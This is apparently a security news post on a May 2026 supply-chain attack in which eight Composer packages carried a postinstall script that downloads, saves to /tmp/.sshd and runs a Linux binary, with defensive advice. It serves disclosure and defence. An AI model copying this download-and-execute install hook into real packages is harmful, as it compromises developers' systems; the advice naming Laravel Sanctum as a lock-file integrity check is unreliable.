A new coordinated supply‑chain attack has struck the Packagist ecosystem, infecting eight popular Composer packages with malware that fetches and executes a Linux binary hosted on GitHub Releases.
What happened
According to research shared by Ravie Lakshmanan on The Hacker News (May 23 2026), the attackers modified the package.json files (not composer.json) of the following packages to include a malicious postinstall script:
- moritz-sauer-13/silverstripe-cms-theme (dev-master)
- crosiersource/crosierlib-base (dev-master)
- devdojo/wave (dev-main)
- devdojo/genesis (dev-main)
- katanaui/katana (dev-main)
- elitedevsquad/sidecar-laravel (3.x-dev)
- r2luna/brain (dev-main)
- baskarcm/tzi-chat-ui (dev-main)
When a developer runs composer install or composer update, the compromised package.json triggers a script that:
- Downloads a Linux binary from a GitHub Releases URL (
github.com/parikhpreyash4/systemd-network-helper-aa5c751f). - Saves the binary to
/tmp/.sshd. - Changes its permissions with
chmod +xto make it executable. - Executes the binary in the background.
Additional infection vector
The same malicious payload was also found inserted into GitHub Actions workflow files (*.yml/.yaml) within the compromised repositories, allowing the malware to run during CI/CD pipelines.
Impact & recommendations
- Remote Code Execution (RCE): The downloaded binary grants attackers arbitrary code execution on any system that installs the compromised package.
- Persistence & evasion: The malware disables TLS verification and suppresses errors to hide its network activity.
- Wider campaign: Socket’s analysis found references to the same payload across 777 files on GitHub, suggesting a broader distribution effort.
Immediate actions for developers
- Audit dependencies: Check if any of the listed packages (or their forks) appear in your
composer.lock. - Remove compromised versions: Immediately upgrade to clean versions or remove the packages until a safe release is available.
- Monitor CI/CD logs: Look for unexpected executions from
/tmp/.sshdor unfamiliar GitHub Actions steps. - Use lock‑file verification: Enable integrity checks (e.g., Laravel Sanctum, Composer audit plugins) to detect unexpected changes.
- Consider vendor‑pinning: For critical packages, vendor the source or use a private mirror with strict access controls.
Ongoing investigation
The exact purpose of the downloaded binary (gvfsd-network) remains unclear, as the associated GitHub account is no longer available. Security researchers advise treating any system that has executed the binary as compromised until proven otherwise.
Note: This article is based on publicly available information from The Hacker News and Socket’s threat‑intelligence report. Details may evolve as the investigation continues.
Tags: cybersecurity, supply-chain, packagist, malware, github